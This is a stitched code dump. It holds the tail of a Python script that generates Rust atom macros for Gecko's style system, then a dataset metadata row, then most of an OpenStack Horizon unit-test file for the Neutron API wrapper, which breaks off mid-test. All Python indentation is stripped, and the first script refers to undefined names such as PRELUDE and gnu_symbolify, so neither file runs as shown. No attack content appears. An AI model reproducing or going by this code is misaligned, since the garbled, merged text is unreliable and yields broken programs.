TYPE = "nsICSSProperty"
SOURCES = [
GkAtomSource,
CSSPseudoElementsAtomSource,
CSSAnonBoxesAtomSource,
CSSPropsAtomSource,
]
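# Each source file is a C++ header of macro invocations; the PATTERNs above
# match lines shaped like (illustrative):
#   GK_ATOM(checkbox, "checkbox")
#   CSS_PSEUDO_ELEMENT(after, ":after", ...)
#   CSS_ANON_BOX(mozText, ":-moz-text")
#   CSS_PROP_FONT(font-family, font_family, ...)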
def map_atom(ident):
if ident in {"box", "loop", "match", "mod", "ref",
"self", "type", "use", "where", "in"}:
return ident + "_"
return ident
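# map_atom keeps generated identifiers legal in Rust: for example the ident
# "loop" becomes "loop_", since "loop" is a Rust keyword.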
class Atom:
def __init__(self, source, ident, value):
self.ident = "{}_{}".format(source.CLASS, ident)
self._original_ident = ident
self.value = value
self.source = source
def cpp_class(self):
return self.source.CLASS
def gnu_symbol(self):
return gnu_symbolify(self.source, self._original_ident)
def msvc32_symbol(self):
return msvc32_symbolify(self.source, self._original_ident)
def msvc64_symbol(self):
return msvc64_symbolify(self.source, self._original_ident)
def type(self):
return self.source.TYPE
def collect_atoms(objdir):
atoms = []
for source in SOURCES:
with open(os.path.join(objdir, source.FILE)) as f:
content = f.read()
found = set()
for match in source.PATTERN.finditer(content):
ident = match.group('ident')
if ident in found:
continue
found.add(ident)
atoms.append(Atom(source, ident, match.group('value')))
return atoms
IMPORTS = ("\nuse gecko_bindings::structs::nsIAtom;"
"\nuse string_cache::Atom;\n\n")
ATOM_TEMPLATE = (" #[link_name = \"{link_name}\"]\n"
" pub static {name}: *mut {type};")
UNSAFE_STATIC = ("#[inline(always)]\n"
"pub unsafe fn atom_from_static(ptr: *mut nsIAtom) -> Atom {\n"
" Atom::from_static(ptr)\n"
"}\n\n")
CFG_IF = '''
cfg_if! {{
if #[cfg(not(target_env = "msvc"))] {{
extern {{
{gnu}
}}
}} else if #[cfg(target_pointer_width = "64")] {{
extern {{
{msvc64}
}}
}} else {{
extern {{
{msvc32}
}}
}}
}}
'''
RULE_TEMPLATE = ('("{atom}") =>\n '
'{{ '
# FIXME(bholley): Uncomment this when rust 1.14 is released.
# See the comment in components/style/lib.rs.
# ' #[allow(unsafe_code)] #[allow(unused_unsafe)] '
'unsafe {{ $crate::string_cache::atom_macro::atom_from_static'
'($crate::string_cache::atom_macro::{name} as *mut _) }}'
' }};')
MACRO = '''
#[macro_export]
macro_rules! atom {{
{}
}}
'''
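# As an illustration, an atom whose value is "foo" and whose ident is
# nsGkAtoms_foo would contribute the macro arm:
#   ("foo") =>
#    { unsafe { $crate::string_cache::atom_macro::atom_from_static(
#      $crate::string_cache::atom_macro::nsGkAtoms_foo as *mut _) } };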
def write_atom_macro(atoms, file_name):
def get_symbols(func):
return '\n'.join([ATOM_TEMPLATE.format(name=atom.ident,
link_name=func(atom),
type=atom.type()) for atom in atoms])
with open(file_name, "wb") as f:
f.write(PRELUDE)
f.write(IMPORTS)
for source in SOURCES:
if source.TYPE != "nsIAtom":
f.write("pub enum {} {{}}\n\n".format(source.TYPE))
f.write(UNSAFE_STATIC)
gnu_symbols = get_symbols(Atom.gnu_symbol)
msvc32_symbols = get_symbols(Atom.msvc32_symbol)
msvc64_symbols = get_symbols(Atom.msvc64_symbol)
f.write(CFG_IF.format(gnu=gnu_symbols, msvc32=msvc32_symbols, msvc64=msvc64_symbols))
macro_rules = [RULE_TEMPLATE.format(atom=atom.value, name=atom.ident) for atom in atoms]
f.write(MACRO.format('\n'.join(macro_rules)))
PSEUDO_ELEMENT_HEADER = """
/*
* This file contains a helper macro invocation to aid Gecko's style system
* pseudo-element integration.
*
* This file is NOT INTENDED to be compiled as a standalone module.
*
* Also, it guarantees the property that normal pseudo-elements are processed
* before anonymous boxes.
*
* Expected usage is as follows:
*
* ```
* fn have_to_use_pseudo_elements() {
* macro_rules pseudo_element! {
* ($pseudo_str_with_colon:expr, $pseudo_atom:expr, $is_anon_box:true) => {{
* // Stuff stuff stuff.
* }}
* }
* include!("path/to/helper.rs")
* }
* ```
*
*/
"""
PSEUDO_ELEMENT_MACRO_INVOCATION = """
pseudo_element!(\"{}\",
atom!(\"{}\"),
{});
"""[1:]
def write_pseudo_element_helper(atoms, target_filename):
with open(target_filename, "wb") as f:
f.write(PRELUDE)
f.write(PSEUDO_ELEMENT_HEADER)
f.write("{\n")
for atom in atoms:
if atom.type() == "nsICSSPseudoElement":
f.write(PSEUDO_ELEMENT_MACRO_INVOCATION.format(atom.value, atom.value, "false"))
elif atom.type() == "nsICSSAnonBoxPseudo":
f.write(PSEUDO_ELEMENT_MACRO_INVOCATION.format(atom.value, atom.value, "true"))
f.write("}\n")
def build(objdir, verbose=False):
atoms = collect_atoms(objdir)
write_atom_macro(atoms, "../gecko_string_cache/atom_macro.rs")
write_pseudo_element_helper(atoms, "../gecko/generated/gecko_pseudo_element_helper.rs")
return 0
| mpl-2.0 | -7,448,468,700,294,948,000 | 28.638655 | 96 | 0.58279 | false |
NeCTAR-RC/horizon | openstack_dashboard/test/unit/api/test_neutron.py | 1 | 76425 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
import netaddr
from neutronclient.common import exceptions as neutron_exc
from oslo_utils import uuidutils
import six
from django.test.utils import override_settings
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard.test import helpers as test
class NeutronApiTests(test.APIMockTestCase):
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_list(self, mock_neutronclient):
networks = {'networks': self.api_networks.list()}
subnets = {'subnets': self.api_subnets.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_networks.return_value = networks
neutronclient.list_subnets.return_value = subnets
ret_val = api.neutron.network_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.Network)
neutronclient.list_networks.assert_called_once_with()
neutronclient.list_subnets.assert_called_once_with()
@override_settings(OPENSTACK_NEUTRON_NETWORK={
'enable_auto_allocated_network': True})
@test.create_mocks({api.neutron: ('network_list',
'subnet_list')})
def _test_network_list_for_tenant(
self, include_external,
filter_params, should_called, **extra_kwargs):
"""Convenient method to test network_list_for_tenant.
:param include_external: Passed to network_list_for_tenant.
:param filter_params: Filters passed to network_list_for_tenant
        :param should_called: names of the methods which are expected to be
            called. Valid values are non_shared, shared, and external.
"""
filter_params = filter_params or {}
all_networks = self.networks.list()
tenant_id = '1'
tenant_networks = [n for n in all_networks
if n['tenant_id'] == tenant_id]
shared_networks = [n for n in all_networks if n['shared']]
external_networks = [n for n in all_networks if n['router:external']]
return_values = []
expected_calls = []
if 'non_shared' in should_called:
params = filter_params.copy()
params['shared'] = False
return_values.append(tenant_networks)
expected_calls.append(
mock.call(test.IsHttpRequest(), tenant_id=tenant_id, **params),
)
if 'shared' in should_called:
params = filter_params.copy()
params['shared'] = True
return_values.append(shared_networks)
expected_calls.append(
mock.call(test.IsHttpRequest(), **params),
)
if 'external' in should_called:
params = filter_params.copy()
params['router:external'] = True
return_values.append(external_networks)
expected_calls.append(
mock.call(test.IsHttpRequest(), **params),
)
self.mock_network_list.side_effect = return_values
extra_kwargs.update(filter_params)
ret_val = api.neutron.network_list_for_tenant(
self.request, tenant_id,
include_external=include_external,
**extra_kwargs)
expected = []
if 'non_shared' in should_called:
expected += tenant_networks
if 'shared' in should_called:
expected += shared_networks
if 'external' in should_called and include_external:
expected += external_networks
self.assertEqual(set(n.id for n in expected),
set(n.id for n in ret_val))
self.mock_network_list.assert_has_calls(expected_calls)
        # Ensure all three types of networks are non-empty. This is required
        # to check that the 'pre_auto_allocate' network is not included.
self.assertTrue(tenant_networks)
self.assertTrue(shared_networks)
self.assertTrue(external_networks)
self.assertNotIn(api.neutron.AUTO_ALLOCATE_ID,
[n.id for n in ret_val])
def test_network_list_for_tenant(self):
self._test_network_list_for_tenant(
include_external=False, filter_params=None,
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_external(self):
self._test_network_list_for_tenant(
include_external=True, filter_params=None,
should_called=['non_shared', 'shared', 'external'])
def test_network_list_for_tenant_with_filters_shared_false_wo_incext(self):
self._test_network_list_for_tenant(
include_external=False, filter_params={'shared': True},
should_called=['shared'])
def test_network_list_for_tenant_with_filters_shared_true_w_incext(self):
self._test_network_list_for_tenant(
include_external=True, filter_params={'shared': True},
should_called=['shared', 'external'])
def test_network_list_for_tenant_with_filters_ext_false_wo_incext(self):
self._test_network_list_for_tenant(
include_external=False, filter_params={'router:external': False},
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_filters_ext_true_wo_incext(self):
self._test_network_list_for_tenant(
include_external=False, filter_params={'router:external': True},
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_filters_ext_false_w_incext(self):
self._test_network_list_for_tenant(
include_external=True, filter_params={'router:external': False},
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_filters_ext_true_w_incext(self):
self._test_network_list_for_tenant(
include_external=True, filter_params={'router:external': True},
should_called=['non_shared', 'shared', 'external'])
def test_network_list_for_tenant_with_filters_both_shared_ext(self):
# To check 'shared' filter is specified in network_list
# to look up external networks.
self._test_network_list_for_tenant(
include_external=True,
filter_params={'router:external': True, 'shared': True},
should_called=['shared', 'external'])
def test_network_list_for_tenant_with_other_filters(self):
# To check filter parameters other than shared and
# router:external are passed as expected.
self._test_network_list_for_tenant(
include_external=True,
filter_params={'router:external': True, 'shared': False,
'foo': 'bar'},
should_called=['non_shared', 'external'])
def test_network_list_for_tenant_no_pre_auto_allocate_if_net_exists(self):
self._test_network_list_for_tenant(
include_external=True, filter_params=None,
should_called=['non_shared', 'shared', 'external'],
include_pre_auto_allocate=True)
@override_settings(OPENSTACK_NEUTRON_NETWORK={
'enable_auto_allocated_network': True})
@test.create_mocks({api.neutron: ['network_list',
'is_extension_supported'],
api.nova: ['is_feature_available']})
def test_network_list_for_tenant_with_pre_auto_allocate(self):
tenant_id = '1'
self.mock_network_list.return_value = []
self.mock_is_extension_supported.return_value = True
self.mock_is_feature_available.return_value = True
ret_val = api.neutron.network_list_for_tenant(
self.request, tenant_id, include_pre_auto_allocate=True)
self.assertEqual(1, len(ret_val))
self.assertIsInstance(ret_val[0], api.neutron.PreAutoAllocateNetwork)
self.assertEqual(api.neutron.AUTO_ALLOCATE_ID, ret_val[0].id)
self.assertEqual(2, self.mock_network_list.call_count)
self.mock_network_list.assert_has_calls([
mock.call(test.IsHttpRequest(), tenant_id=tenant_id,
shared=False),
mock.call(test.IsHttpRequest(), shared=True),
])
self.mock_is_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'auto-allocated-topology')
self.mock_is_feature_available.assert_called_once_with(
test.IsHttpRequest(),
('instance_description', 'auto_allocated_network'))
@test.create_mocks({api.neutron: ['network_list']})
def test_network_list_for_tenant_no_pre_auto_allocate_if_disabled(self):
tenant_id = '1'
self.mock_network_list.return_value = []
ret_val = api.neutron.network_list_for_tenant(
self.request, tenant_id, include_pre_auto_allocate=True)
self.assertEqual(0, len(ret_val))
self.assertEqual(2, self.mock_network_list.call_count)
self.mock_network_list.assert_has_calls([
mock.call(test.IsHttpRequest(), tenant_id=tenant_id,
shared=False),
mock.call(test.IsHttpRequest(), shared=True),
])
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_get(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
subnet = {'subnet': self.api_subnets.first()}
subnetv6 = {'subnet': self.api_subnets.list()[1]}
network_id = self.api_networks.first()['id']
subnet_id = self.api_networks.first()['subnets'][0]
subnetv6_id = self.api_networks.first()['subnets'][1]
neutronclient = mock_neutronclient.return_value
neutronclient.show_network.return_value = network
neutronclient.show_subnet.side_effect = [subnet, subnetv6]
ret_val = api.neutron.network_get(self.request, network_id)
self.assertIsInstance(ret_val, api.neutron.Network)
self.assertEqual(2, len(ret_val['subnets']))
self.assertIsInstance(ret_val['subnets'][0], api.neutron.Subnet)
neutronclient.show_network.assert_called_once_with(network_id)
neutronclient.show_subnet.assert_has_calls([
mock.call(subnet_id),
mock.call(subnetv6_id),
])
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_get_with_subnet_get_notfound(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
network_id = self.api_networks.first()['id']
subnet_id = self.api_networks.first()['subnets'][0]
neutronclient = mock_neutronclient.return_value
neutronclient.show_network.return_value = network
neutronclient.show_subnet.side_effect = neutron_exc.NotFound
ret_val = api.neutron.network_get(self.request, network_id)
self.assertIsInstance(ret_val, api.neutron.Network)
self.assertEqual(2, len(ret_val['subnets']))
self.assertNotIsInstance(ret_val['subnets'][0], api.neutron.Subnet)
self.assertIsInstance(ret_val['subnets'][0], str)
neutronclient.show_network.assert_called_once_with(network_id)
neutronclient.show_subnet.assert_called_once_with(subnet_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_create(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
form_data = {'network': {'name': 'net1',
'tenant_id': self.request.user.project_id}}
neutronclient = mock_neutronclient.return_value
neutronclient.create_network.return_value = network
ret_val = api.neutron.network_create(self.request, name='net1')
self.assertIsInstance(ret_val, api.neutron.Network)
neutronclient.create_network.assert_called_once_with(body=form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_update(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
network_id = self.api_networks.first()['id']
neutronclient = mock_neutronclient.return_value
form_data = {'network': {'name': 'net1'}}
neutronclient.update_network.return_value = network
ret_val = api.neutron.network_update(self.request, network_id,
name='net1')
self.assertIsInstance(ret_val, api.neutron.Network)
neutronclient.update_network.assert_called_once_with(network_id,
body=form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_delete(self, mock_neutronclient):
network_id = self.api_networks.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_network.return_value = None
api.neutron.network_delete(self.request, network_id)
neutronclient.delete_network.assert_called_once_with(network_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_get_network_ip_availability(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
mock_ip_availability = self.ip_availability.get()
neutronclient = mock_neutronclient.return_value
neutronclient.show_network_ip_availability.return_value = \
mock_ip_availability
ret_val = api.neutron.show_network_ip_availability(self.request,
network)
self.assertIsInstance(ret_val, dict)
neutronclient.show_network_ip_availability.assert_called_once_with(
network)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_network_ip_availability(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
mock_ip_availability = self.ip_availability.get()
neutronclient = mock_neutronclient.return_value
neutronclient.show_network_ip_availability.return_value = \
mock_ip_availability
ip_availability = api.neutron. \
show_network_ip_availability(self.request, network)
availabilities = ip_availability.get("network_ip_availability",
{})
ret_val = availabilities.get("subnet_ip_availability", [])
self.assertIsInstance(ret_val, list)
neutronclient.show_network_ip_availability.assert_called_once_with(
network)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_list(self, mock_neutronclient):
subnets = {'subnets': self.api_subnets.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_subnets.return_value = subnets
ret_val = api.neutron.subnet_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.Subnet)
neutronclient.list_subnets.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_get(self, mock_neutronclient):
subnet = {'subnet': self.api_subnets.first()}
subnet_id = self.api_subnets.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_subnet.return_value = subnet
ret_val = api.neutron.subnet_get(self.request, subnet_id)
self.assertIsInstance(ret_val, api.neutron.Subnet)
neutronclient.show_subnet.assert_called_once_with(subnet_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_create(self, mock_neutronclient):
subnet_data = self.api_subnets.first()
params = {'network_id': subnet_data['network_id'],
'tenant_id': subnet_data['tenant_id'],
'name': subnet_data['name'],
'cidr': subnet_data['cidr'],
'ip_version': subnet_data['ip_version'],
'gateway_ip': subnet_data['gateway_ip']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_subnet.return_value = {'subnet': subnet_data}
ret_val = api.neutron.subnet_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.Subnet)
neutronclient.create_subnet.assert_called_once_with(
body={'subnet': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_update(self, mock_neutronclient):
subnet_data = self.api_subnets.first()
subnet_id = subnet_data['id']
params = {'name': subnet_data['name'],
'gateway_ip': subnet_data['gateway_ip']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_subnet.return_value = {'subnet': subnet_data}
ret_val = api.neutron.subnet_update(self.request, subnet_id, **params)
self.assertIsInstance(ret_val, api.neutron.Subnet)
neutronclient.update_subnet.assert_called_once_with(
subnet_id, body={'subnet': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnet_delete(self, mock_neutronclient):
subnet_id = self.api_subnets.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_subnet.return_value = None
api.neutron.subnet_delete(self.request, subnet_id)
neutronclient.delete_subnet.assert_called_once_with(subnet_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_list(self, mock_neutronclient):
subnetpools = {'subnetpools': self.api_subnetpools.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_subnetpools.return_value = subnetpools
ret_val = api.neutron.subnetpool_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.SubnetPool)
neutronclient.list_subnetpools.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_get(self, mock_neutronclient):
subnetpool = {'subnetpool': self.api_subnetpools.first()}
subnetpool_id = self.api_subnetpools.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_subnetpool.return_value = subnetpool
ret_val = api.neutron.subnetpool_get(self.request, subnetpool_id)
self.assertIsInstance(ret_val, api.neutron.SubnetPool)
neutronclient.show_subnetpool.assert_called_once_with(subnetpool_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_create(self, mock_neutronclient):
subnetpool_data = self.api_subnetpools.first()
params = {'name': subnetpool_data['name'],
'prefixes': subnetpool_data['prefixes'],
'tenant_id': subnetpool_data['tenant_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_subnetpool.return_value = {'subnetpool':
subnetpool_data}
ret_val = api.neutron.subnetpool_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.SubnetPool)
neutronclient.create_subnetpool.assert_called_once_with(
body={'subnetpool': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_update(self, mock_neutronclient):
subnetpool_data = self.api_subnetpools.first()
subnetpool_id = subnetpool_data['id']
params = {'name': subnetpool_data['name'],
'prefixes': subnetpool_data['prefixes']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_subnetpool.return_value = {'subnetpool':
subnetpool_data}
ret_val = api.neutron.subnetpool_update(self.request, subnetpool_id,
**params)
self.assertIsInstance(ret_val, api.neutron.SubnetPool)
neutronclient.update_subnetpool.assert_called_once_with(
subnetpool_id, body={'subnetpool': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_subnetpool_delete(self, mock_neutronclient):
subnetpool_id = self.api_subnetpools.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_subnetpool.return_value = None
api.neutron.subnetpool_delete(self.request, subnetpool_id)
neutronclient.delete_subnetpool.assert_called_once_with(subnetpool_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_list(self, mock_neutronclient):
ports = {'ports': self.api_ports.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_ports.return_value = ports
ret_val = api.neutron.port_list(self.request)
for p in ret_val:
self.assertIsInstance(p, api.neutron.Port)
neutronclient.list_ports.assert_called_once_with()
@mock.patch.object(api.neutron, 'is_extension_supported')
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_list_with_trunk_types(
self, mock_neutronclient, mock_is_extension_supported):
ports = self.api_tp_ports.list()
trunks = self.api_tp_trunks.list()
# list_extensions is decorated with memoized_with_request, so
# neutronclient() is not called. We need to mock it separately.
mock_is_extension_supported.return_value = True # trunk
neutronclient = mock_neutronclient.return_value
neutronclient.list_ports.return_value = {'ports': ports}
neutronclient.list_trunks.return_value = {'trunks': trunks}
expected_parent_port_ids = set()
expected_subport_ids = set()
for trunk in trunks:
expected_parent_port_ids.add(trunk['port_id'])
expected_subport_ids |= set([p['port_id'] for p
in trunk['sub_ports']])
expected_normal_port_ids = ({p['id'] for p in ports} -
expected_parent_port_ids -
expected_subport_ids)
ret_val = api.neutron.port_list_with_trunk_types(self.request)
self.assertEqual(len(ports), len(ret_val))
parent_port_ids = {p.id for p in ret_val
if isinstance(p, api.neutron.PortTrunkParent)}
subport_ids = {p.id for p in ret_val
if isinstance(p, api.neutron.PortTrunkSubport)}
normal_port_ids = ({p.id for p in ret_val} -
parent_port_ids - subport_ids)
self.assertEqual(expected_parent_port_ids, parent_port_ids)
self.assertEqual(expected_subport_ids, subport_ids)
self.assertEqual(expected_normal_port_ids, normal_port_ids)
mock_is_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'trunk')
neutronclient.list_ports.assert_called_once_with()
neutronclient.list_trunks.assert_called_once_with()
@mock.patch.object(api.neutron, 'is_extension_supported')
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_list_with_trunk_types_without_trunk_extension(
self, mock_neutronclient, mock_is_extension_supported):
ports = self.api_tp_ports.list()
        # list_extensions is decorated with memoized_with_request, so
        # the simplest way is to mock it directly.
mock_is_extension_supported.return_value = False # trunk
neutronclient = mock_neutronclient.return_value
neutronclient.list_ports.return_value = {'ports': ports}
ret_val = api.neutron.port_list_with_trunk_types(self.request)
self.assertEqual(len(ports), len(ret_val))
self.assertEqual(set(p['id'] for p in ports),
set(p.id for p in ret_val))
# When trunk extension is disabled, all returned values should be
# instances of Port class.
self.assertTrue(all(isinstance(p, api.neutron.Port) for p in ret_val))
mock_is_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'trunk')
neutronclient.list_ports.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_get(self, mock_neutronclient):
port = {'port': self.api_ports.first()}
port_id = self.api_ports.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_port.return_value = port
ret_val = api.neutron.port_get(self.request, port_id)
self.assertIsInstance(ret_val, api.neutron.Port)
neutronclient.show_port.assert_called_once_with(port_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_create(self, mock_neutronclient):
port = {'port': self.api_ports.first()}
params = {'network_id': port['port']['network_id'],
'tenant_id': port['port']['tenant_id'],
'name': port['port']['name'],
'device_id': port['port']['device_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_port.return_value = port
ret_val = api.neutron.port_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.Port)
self.assertEqual(api.neutron.Port(port['port']).id, ret_val.id)
neutronclient.create_port.assert_called_once_with(
body={'port': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_update(self, mock_neutronclient):
port_data = self.api_ports.first()
port_id = port_data['id']
params = {'name': port_data['name'],
'device_id': port_data['device_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_port.return_value = {'port': port_data}
ret_val = api.neutron.port_update(self.request, port_id, **params)
self.assertIsInstance(ret_val, api.neutron.Port)
self.assertEqual(api.neutron.Port(port_data).id, ret_val.id)
neutronclient.update_port.assert_called_once_with(
port_id, body={'port': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_port_delete(self, mock_neutronclient):
port_id = self.api_ports.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_port.return_value = None
api.neutron.port_delete(self.request, port_id)
neutronclient.delete_port.assert_called_once_with(port_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_list(self, mock_neutronclient):
trunks = {'trunks': self.api_trunks.list()}
neutron_client = mock_neutronclient.return_value
neutron_client.list_trunks.return_value = trunks
ret_val = api.neutron.trunk_list(self.request)
for t in ret_val:
self.assertIsInstance(t, api.neutron.Trunk)
neutron_client.list_trunks.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_show(self, mock_neutronclient):
trunk = {'trunk': self.api_trunks.first()}
trunk_id = self.api_trunks.first()['id']
neutron_client = mock_neutronclient.return_value
neutron_client.show_trunk.return_value = trunk
ret_val = api.neutron.trunk_show(self.request, trunk_id)
self.assertIsInstance(ret_val, api.neutron.Trunk)
neutron_client.show_trunk.assert_called_once_with(trunk_id)
def test_trunk_object(self):
trunk = self.api_trunks.first().copy()
obj = api.neutron.Trunk(trunk)
self.assertEqual(0, obj.subport_count)
trunk_dict = obj.to_dict()
self.assertIsInstance(trunk_dict, dict)
self.assertEqual(trunk['name'], trunk_dict['name_or_id'])
self.assertEqual(0, trunk_dict['subport_count'])
trunk['name'] = '' # to test name_or_id
trunk['sub_ports'] = [uuidutils.generate_uuid() for i in range(2)]
obj = api.neutron.Trunk(trunk)
self.assertEqual(2, obj.subport_count)
trunk_dict = obj.to_dict()
self.assertEqual(obj.name_or_id, trunk_dict['name_or_id'])
self.assertEqual(2, trunk_dict['subport_count'])
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_create(self, mock_neutronclient):
trunk = {'trunk': self.api_trunks.first()}
params = {'name': trunk['trunk']['name'],
'port_id': trunk['trunk']['port_id'],
'project_id': trunk['trunk']['project_id']}
neutronclient = mock_neutronclient.return_value
neutronclient.create_trunk.return_value = trunk
ret_val = api.neutron.trunk_create(self.request, **params)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk['trunk']).id, ret_val.id)
neutronclient.create_trunk.assert_called_once_with(
body={'trunk': params})
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_delete(self, mock_neutronclient):
trunk_id = self.api_trunks.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_trunk.return_value = None
api.neutron.trunk_delete(self.request, trunk_id)
neutronclient.delete_trunk.assert_called_once_with(trunk_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_update_details(self, mock_neutronclient):
trunk_data = self.api_trunks.first()
trunk_id = trunk_data['id']
old_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'admin_state_up': trunk_data['admin_state_up']}
new_trunk = {'name': 'foo',
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'admin_state_up': trunk_data['admin_state_up']}
neutronclient = mock_neutronclient.return_value
neutronclient.update_trunk.return_value = {'trunk': new_trunk}
ret_val = api.neutron.trunk_update(self.request, trunk_id,
old_trunk, new_trunk)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk_data).id, ret_val.id)
self.assertEqual(ret_val.name, new_trunk['name'])
neutronclient.update_trunk.assert_called_once_with(
trunk_id, body={'trunk': {'name': 'foo'}})
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_update_add_subports(self, mock_neutronclient):
trunk_data = self.api_trunks.first()
trunk_id = trunk_data['id']
old_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': trunk_data['sub_ports'],
'admin_state_up': trunk_data['admin_state_up']}
new_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': [
{'port_id': 1,
'segmentation_id': 100,
'segmentation_type': 'vlan'}],
'admin_state_up': trunk_data['admin_state_up']}
neutronclient = mock_neutronclient.return_value
neutronclient.trunk_add_subports.return_value = {'trunk': new_trunk}
ret_val = api.neutron.trunk_update(self.request, trunk_id,
old_trunk, new_trunk)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk_data).id, ret_val.trunk['id'])
self.assertEqual(ret_val.trunk['sub_ports'], new_trunk['sub_ports'])
neutronclient.trunk_add_subports.assert_called_once_with(
trunk_id,
body={'sub_ports': [{'port_id': 1, 'segmentation_id': 100,
'segmentation_type': 'vlan'}]}
)
@mock.patch.object(api.neutron, 'neutronclient')
def test_trunk_update_remove_subports(self, mock_neutronclient):
trunk_data = self.api_trunks.first()
trunk_id = trunk_data['id']
old_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': [
{'port_id': 1,
'segmentation_id': 100,
'segmentation_type': 'vlan'}],
'admin_state_up': trunk_data['admin_state_up']}
new_trunk = {'name': trunk_data['name'],
'description': trunk_data['description'],
'id': trunk_data['id'],
'port_id': trunk_data['port_id'],
'sub_ports': [],
'admin_state_up': trunk_data['admin_state_up']}
neutronclient = mock_neutronclient.return_value
neutronclient.trunk_remove_subports.return_value = {'trunk': new_trunk}
ret_val = api.neutron.trunk_update(self.request, trunk_id,
old_trunk, new_trunk)
self.assertIsInstance(ret_val, api.neutron.Trunk)
self.assertEqual(api.neutron.Trunk(trunk_data).id, ret_val.trunk['id'])
self.assertEqual(ret_val.trunk['sub_ports'], new_trunk['sub_ports'])
neutronclient.trunk_remove_subports.assert_called_once_with(
trunk_id,
body={'sub_ports': [{'port_id':
old_trunk['sub_ports'][0]['port_id']}]}
)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_list(self, mock_neutronclient):
routers = {'routers': self.api_routers.list()}
